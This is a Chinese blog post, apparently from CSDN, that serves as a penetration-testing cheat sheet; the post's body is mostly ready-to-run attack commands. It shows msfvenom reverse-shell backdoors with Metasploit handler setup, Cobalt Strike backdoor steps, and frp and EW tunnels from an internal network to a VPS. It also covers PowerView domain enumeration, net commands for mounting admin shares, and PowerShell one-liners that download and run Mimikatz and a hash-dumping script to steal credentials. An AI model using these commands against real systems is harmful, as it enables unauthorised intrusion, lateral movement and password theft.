渗透测试基础知识

最新推荐文章于 2023-12-21 12:36:59 发布
最新推荐文章于 2023-12-21 12:36:59 发布
阅读量1.2k 收藏 8
点赞数 3
分类专栏: 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/a3320315/article/details/106178290
版权

反弹shell

  • MSF

    • windows:
      生成后门

      msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.5 lport=4444 -f exe > test.exe

      msf等待连接

      use exploit/multi/handler

set payload windows/x64/meterpreter/reverse_tcp
	
set lhost 192.168.1.5
	
set lport 4444
	
exploit

    • linux
      生成后门

      msfvenom -p linux/x64/meterpreter/reverse_tcp lhost=192.168.1.5 lport=4444 -f elf > test.elf

      msf等待连接

      use exploit/multi/handler

set payload linux/x64/meterpreter/reverse_tcp
	
set lhost 192.168.1.5
	
set lport 4444
	
exploit

meterpreter中可以直接加载kiwi,即mimikatz

load kiwi
kiwi_cmd kerberos::list   #执行mimikatz命令

	<br>
	<br>

  • CS

    • 先在vps上运行./teamserver 129.204.207.xxx 123456
    • 然后客户端连接vps
      在这里插入图片描述
    • 生成监听器
      在这里插入图片描述
    • 生成后门
      在这里插入图片描述
    • 然后在内网中运行后门,等待主机上线


内网穿透

  • frp端口代理
    在vps上的服务端配置为:

    [common]
bind_port = 7000

    内网的客户端配置为:

     [common]
	server_addr = 129.204.207.xxx   #公网IP
	server_port = 7000
	
 [ssh]
	type = tcp
	local_ip = 127.0.0.1
	local_port = 80
	remote_port = 6000
	
[plugin_socks5]
	type = tcp 
	remote_port = 8088 
	plugin = socks5 
	use_encryption = true
	use_compression = true

    129.204.207.xxx:6000 即可访问内网的80端口
    129.204.207.xxx:8088即可进行socks5代理



  • EW sock代理(反向代理)
    在vps上运行:

    ew_for_linux64 -s rcsocks -l 1080 -e 1024
#即vps监听1080和1024端口,当攻击者访问1080端口,则访问1024端口

    在内网运行:
    ew_for_Win.exe -s rssocks -d 129.204.207.xxx -e 1024

    则我们在攻击机上的一些软件的流量就可以代理到内网中



    windows:

    在windows中我们可以使用Proxifier
    在这里插入图片描述在这里插入图片描述我们也可以直接在对浏览器设置sock代理,然后直接访问内网的web
    在这里插入图片描述



    linux:

    在linux中我们可以使用proxychains
    安装:

    cd /usr/local/src
git clone https://github.com/rofl0r/proxychains-ng.git
cd proxychains-ng 
./configure --prefix=/usr --sysconfdir=/etc
make && make install
make install-config
cd .. && rm -rf proxychains-ng

    配置:

    vim /etc/proxychains.conf
socks5 129.204.207.xxx 1080

    在命令前加上proxychains4即可完成对内网的访问操作

    proxychains4 ssh 目标服务器

参考链接:SOCKS代理:从科学上网到内网漫游
参考链接:Socks代理反弹突破内网





powerview.ps1的使用

powershell的基本使用(引入本地的ps1脚本)

powershell.exe -exec bypass -Command "& {Import-Module .\Powerview.ps1;Invoke-UserHunter}"

在msf中加载powershell

load powershell
powershell_import /root/Desktop/PowerView.ps1
powershell_execute Get-NetDomain

脚本功能

Get-NetDomain 获取当前用户所在域的名称
Get-NetUser 获取所有用户的详细信息
Get-NetDomainController 获取所有域控制器的信息
Get-NetComputer 获取域内所有机器的详细信息
Get-NetPrinter 获取域中所有当前计算机对象的数组
Get-NetOU 获取域内的OU信息
Get-NetGroup 获取所有域内组和组成员的信息
Get-NetGroupMember 获取指定域组中所有当前用户的列表
Get-NetFileServer 根据SPN获取当前域使用的文件服务器信息
Get-NetShare 获取当前域内所有的网络共享信息
Get-DFSshare 获取域上所有分发文件系统共享的列表
Get-NetSubnet 获取域的其他网段
Get-NetSite 获取域内的当前站点
Get-NetDomainTrust 获取当前用户域的所有信任
Get-NetForestTrust 获取与当前用户的域关联的林的所有信任
Find-ForeignUser 枚举在其主域之外的组中的用户
Find-ForeignGroup 枚举域组的所有成员并查找查询域之外的用户
Invoke-MapDomainTrust 尝试构建所有域信任的关系映射
Get-NetLoggedon 获取主动登录到指定服务器的用户
Get-NetLocalGroup 获取一个或多个远程主机上本地组的成员
Get-NetSession 获取指定服务器的会话
Get-NetRDPSession 获取指定服务器的远程连接
Get-NetProcess 获取远程主机的进程
Get-UserEvent 获取指定用户的日志
Get-ADObject 获取活动目录的对象
Get-NetGPO 获取域内所有的组策略对象
Get-NetGPOGroup 获取域中设置”受限组”的所有GPO
Find-GPOLocation 获取用户/组,并通过GPO枚举和关联使其具有有效权限的计算机
Find-GPOComputerAdmin 获取计算机并通过GPO枚举确定谁对其具有管理权限
Get-DomainPolicy 获取域默认策略或域控制器策略
Get-DomainSID 返回指定域的SID
Invoke-UserHunter 获取域用户登录的计算机信息及该用户是否有本地管理员权限
Invoke-ProcessHunter 通过查询域内所有的机器进程找到特定用户
Invoke-UserEventHunter 根据用户日志查询某域用户登陆过哪些域机器
Invoke-ShareFinder 在本地域中的主机上查找(非标准)共享
Invoke-FileFinder 在本地域中的主机上查找潜在的敏感文件
Find-LocalAdminAccess 在域上查找当前用户具有本地管理员访问权限的计算机
Find-ManagedSecurityGroups 搜索受管理的活动目录安全组并标识对其具有写访问权限的用户,即这些组拥有添加或删除成员的能力
Get-ExploitableSystem 发现系统可能易受常见攻击
Invoke-EnumerateLocalAdmin 枚举域中所有计算机上本地管理员组的成员


域内常见命令

将远程主机的C盘挂载到本机上的H盘

net use h: \\192.168.1.*\c$ "password" /user:"administrator"

删除映射的h盘,其他盘类推

net use h: /del

查看本机的用户

net user

查看域内的用户

net user /domain

查看域内的计算机用户名

net view

查看域名

net view /domain

查看AD机器的共享文件夹

net view \\AD

得到域控主机名

net group "domain controllers" /domain   #主机名后面会多一个$

查看域控的管理员用户

net group "domain admins" /domain

查看当前登录域

net config workstation


域渗透过程

1、首先信息收集,获得域控IP

net group "domain controllers" /domain   #得到域控主机名

然后直接ping主机名就可以得到域控的IP

也可以直接用nbtscan.exe来探测域主机的状况

nbtscan.exe  192.168.93.0/24

2、端口探测
EW将内网网络代理出来,然后直接用PortScan.exe工具扫描

3、当知道某个本地管理员权限的账号
直接使用wmiexec连接,可以操做cmd

4、当反弹会cmdshell后,就可以抓取密码了
抓明文:

powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz –DumpCerts

抓hash:

powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/master/Gather/Get-PassHashes.ps1');Get-PassHashes
HyyMbb
关注
  • 3
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
kiwi简介
铭星的专栏
09-29 4803
概述 我的整个跨平台研发工作暂命名为kiwi。这个工作产生的工作成果直接构成了kiwikiwi是什么? Kiwi是一个跨平台应用程序开发、运行框架。这点有别于hotfox。Hotfox定位于应用服务器开发、运行框架。Kiwi将应用服务器框架作为一个子项目在kiwi框架做为一个可选项。 Kiwi不同于QT。QT是一个应用程序开发库。这里我想用通俗的比喻阐释库与框架的区别。库就像是一堆零部
系统渗透与防护——漏洞分析
m0_60643467的博客
10-07 753
第八步,MS15-034 漏洞防御-安装补丁,上传 MS15-034-Windows6.1-KB3042553-x64-2008R2.msu到win2k8,在win2k8 安装MS15-034 补丁,安装完补丁后,系统会重启,也可以去微软官网-下载心去下载补丁。检查 Win2008服务器-UAC状态,运行输入msconfig,默认用户账户是关闭的,先给Win2008打开,ADD添加一个注册表项-v创建键值-T键值类型-d键值的值1/0。第六步,关闭内核缓存后,再次发起攻击,发现不再蓝屏。
【工具使用】——MSF使用_MSFkiwi(mimikatz)模块使用
weixin_45588247的博客
08-08 9686
文章目录一、简介:二、前提:1. 提权到system权限:1.1 提到system有两个方法:1.2 进行提权:2. 进程迁移:三、kiwi模块使用:1. creds_all:2. kiwi_cmd: 一、简介: kiwi模块:   mimikatz模块已经合并为kiwi模块使用kiwi模块需要system权限,所以我们在使用模块之前需要将当前MSF的shell提升为system。 二、前提: 1. 提权到system权限: 1.1 提到system有两个方法:   一是当前的权限是admin
MSF使用详解
m0_52051132的博客
10-19 7635
一、 Meterpreter是什么Meterpreter是Metasploit框架的一个利器,作为漏洞溢出后的攻击载荷使用,攻击载荷在触发漏洞后会返回一个由我们控制的通道,可用于远程执行命令!Metasploit提供了各个主流平台的Meterpreter版本,包括Windows、Linux,同时支持x86、x64平台,另外,Meterpreter还提供了基于PHP和Java语言的实现。Meterpreter的工作模式是纯内存的,好处是启动隐藏,很难被杀毒软件监测到。
基于MSF框架下的kiwi模块制作黄金票据
weixin_60109175的博客
04-05 5354
目录 一、kiwi模块使用简介 1.权限问题 2.使用注意事项 3.关于kiwi的命令简介 二、实验过程 1.环境构成 2.实验步骤 三、黄金票据的制作使用 1.制作票据的条件,以及如何获取该条件内容 2.制作黄金票据 3.黄金票据的使用 一、kiwi模块使用简介 1.权限问题 kiwi模块使用需要域内管理员或者系统权限,如果是非管理员权限那么使用会受到很大的限制 2.使用注意事项 msfkiwi模块同时支持32位和64位操作系统,...
web渗透基础基础知识
12-13
主要是写了web渗透的基本知识,,里面也有些图解,可以更好地理解
渗透测试常规思路分析
02-26
渗透测试是门技术,也是一门艺术。这门技术(艺术)一开始也不是每个人都会的,正所谓没有人一出生就会走路,从不懂到入门到深谙,一步步慢慢来,每个人都是这样;但是在这个过程,思路无疑是最重要的,没有做不到...
Kali Linux渗透测试技术详解
最新发布
02-19
第1篇为Iinux安全渗透测试基础,介绍了Linux安全透简介、安装及配置KaliLinux 操作系统、配置目标测试系统:第2篇为信息的收集及利用,介绍了信息收集、漏洞扫描、漏洞利用等技术:第3篇为各种渗透测试,介绍了权限...
渗透测试.pdf
07-15
渗透测试方面的基础知识渗透测试概念、 意义、方法、 分类等, 还讲解了信息收集的常见方法, 最重要的是使用搜索引擎
渗透测试入门教程(非常详细),从零基础入门到精通,看完这一篇就够了
热门推荐
Python_0011的博客
01-07 2万+
渗透测试就是模拟真实黑客的攻击手法对目标网站或主机进行全面的安全评估,与黑客攻击不一样的是,渗透测试的目的是尽可能多地发现安全漏洞,而真实黑客攻击只要发现一处入侵点即可以进入目标系统。一名优秀的渗透测试工程师也可以认为是一个厉害的黑客,也可以被称呼为白帽子。一定要注意的是,在进行渗透测试前,需要获得目标客户的授权,如果未获得授权,千万不要对目标系统进行渗透测试,后果请查看《网络安全法》。同时要有良好的职业操守,不能干一些违法的事情。网络安全产业就像一个江湖,各色人等聚集。
渗透测试基础,初识渗透测试
大河之犬的博客
06-23 3290
1、脚本(asp、php、jsp)3、HTTP协议4、CMS内容管理系统(B/S)5、MD5/加盐(salt)6、肉鸡、抓鸡、DDOS、cc(耗费自己的CPU资源分配代理服务器)7、一句话、小马、大马webshell、提权、后门、跳板、rookit8、源码打包、脱裤、暴库9、嗅探、rookit、社工11、src平台、0day12、事件型漏洞,通用型漏洞13、web服务器、web容器、间件。
神仙级渗透测试入门教程(非常详细),从零基础入门到精通,从看这篇开始!
libaiup的博客
06-18 6473
渗透测试:指的是试图利用系统、网络、人力资源或实物资产的弱点或漏洞,以对安全控制的有效性进行压力测试。
渗透测试知识点总结(非常详细),从零基础入门到精通,看完这一篇就够了
xnxqwzy的博客
06-19 1993
直接上货! Win2003,WinXP Mssql开启xp_cmdshell 关闭命令 开启命令 在注入点运行上述语句时,如果出现这样的回显,标记message: 配置选项 ‘xp_cmdshell’ 不存在,可执行以下语句 Mysql日志拿shell Windows提权对照表 Win下面各种文件下载姿势http://www.cnblogs.com/backlion/p/7908563.html https://www.freebuf.com/articles/system/155147.html
Web安全——渗透测试基础知识
钟言的博客
07-10 1495
本篇介绍了Web安全关于渗透知识的下篇,其包含了: VMware虚拟机学习使用 1、虚拟机简单介绍 2、网络模式 2.1 桥接网络 (Bridged Networking)2.2 NAT模式 2.3 Host-Only模式 3、通俗理解 二、Kali的2021安装与配置 1、简单介绍 2、Kali的版本 3、配置 3.1 安装虚拟机open-vm-tools-desktop模块 3.2 设置文 3.3 安装python3的pip 3.4 更新源 2、ascii编码 3、HTML编码 4、URL编码等等
MSFkiwi模块使用
谢公子的博客
03-11 3931
kiwi模块的加载 使用kiwi模块需要system权限,所以我们在使用模块之前需要将当前MSF的shell提升为system。提到system有两个方法,一是当前的权限是administrator用户,二是利用其它手段先提权到administrator用户。然后administrator用户可以直接getsystem到system权限。 提权到system权限 进程迁移 kiwi...
1.渗透测试基础
GUDGET的博客
03-21 7164
目录 渗透测试介绍 渗透术语介绍 测试环境配置 HTTP协议讲解 渗透测试介绍 1.介绍 渗透测试 (penetration test)并没有一个标准的定义,国外一些安全组织达成共识的通用说法是:渗透测试是通过模拟恶意黑客的攻击方法,来评估计算机网络系统安全的一种评估方法。这个过程包括对系统的任何弱点、技术缺陷或漏洞的主动分析,这个分析是从一个攻击者可能存在的位置来进行的,并且从这个位置有条件主动利用安全漏洞。 换句话来说,渗透测试是指渗透人员在不同...
2023年最新版渗透测试入门教程,零基础必看宝藏教程
2301_77193447的博客
03-31 868
渗透测试就是模拟真实黑客的攻击手法对目标网站或主机进行全面的安全评估,与黑客攻击不一样的是,渗透测试的目的是尽可能多地发现安全漏洞,而真实黑客攻击只要发现一处入侵点即可以进入目标系统。一名优秀的渗透测试工程师也可以认为是一个厉害的黑客,也可以被称呼为白帽子。
渗透测试基础知识(新手小白入门必看!)
A1_3_9_7的博客
12-21 431
此阶段的目标是查看该漏洞是否可用于在被利用的系统持久存在 — 足够长的时间让不良行为者获得深度访问权限。渗透测试,也称为笔测试,是针对计算机系统的模拟网络攻击,以检查可利用的漏洞。笔测试可能涉及尝试破坏任意数量的应用程序系统(例如,应用程序协议接口(API)、前端/后端服务器)以发现漏洞,例如容易受到代码注入攻击的未经消毒的输入。对于多种渗透测试(盲测和双盲测试除外),测试人员可能会使用WAF数据(例如日志)来定位和利用应用程序的弱点。定义测试的范围和目标,包括要处理的系统和要使用的测试方法。
后渗透之meterpreter学习笔记
迷风小白
11-08 7714
0x00 前言 由于最近想学习关于内网渗透的一些知识,前面也有师傅写了关于meterpreter的使用攻略,我这里就来复现学习一下。 Meterpreter是Metasploit框架的一个扩展模块,作为后渗透阶段的利器,其强大之处可想而知,我这里就简单介绍一下常用命令。 0x01 系统命令 基本系统命令 background # 将当前会话放置后台 sessions # sessions...
渗透测试,CSRF基础知识
07-23
CSRF(Cross-Site Request Forgery)是一种常见的网络安全漏洞,攻击者利用用户在目标网站的身份验证信息,通过伪造请求来执行非法操作。以下是关于 CSRF 的基础知识: 1. CSRF 的原理:CSRF 攻击利用了网站对用户身份验证的信任,攻击者通过欺骗用户在目标网站上执行一个恶意请求,从而实现对用户账户的操作。 2. CSRF 的过程:攻击者构造一个包含恶意请求的网页,然后诱使用户访问该网页。当用户访问该网页时,其的恶意请求会自动发送给目标网站,而用户并不知情。 3. CSRF 的危害:CSRF 攻击可以导致用户在不知情的情况下执行非法操作,例如更改密码、发送钱款、删除数据等。攻击的危害取决于目标网站上可执行的操作。 4. 防御 CSRF 的措施:为了防止 CSRF 攻击,可以采取以下措施: - 合理使用身份验证:使用随机生成的 token 或验证码来防止跨站请求伪造。 - 检查 Referer 头部:检查请求的 Referer 头部,确保请求是从合法的来源发起的。 - 添加自定义请求头部:在请求添加自定义的头部信息,并在服务器端验证该头部的值。 - 使用 SameSite Cookie 属性:将 Cookie 设置为 SameSite 属性,限制 Cookie 在同一站点内使用。 - 验证请求来源:在服务器端验证请求来源的域名或 IP 地址,拒绝非法的请求。 以上是关于 CSRF 的基础知识,了解 CSRF 攻击的原理和防御措施对于保护网站和用户安全非常重要。在进行渗透测试时,理解 CSRF 的工作原理和常见漏洞场景可以帮助你更好地发现和利用 CSRF 漏洞。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值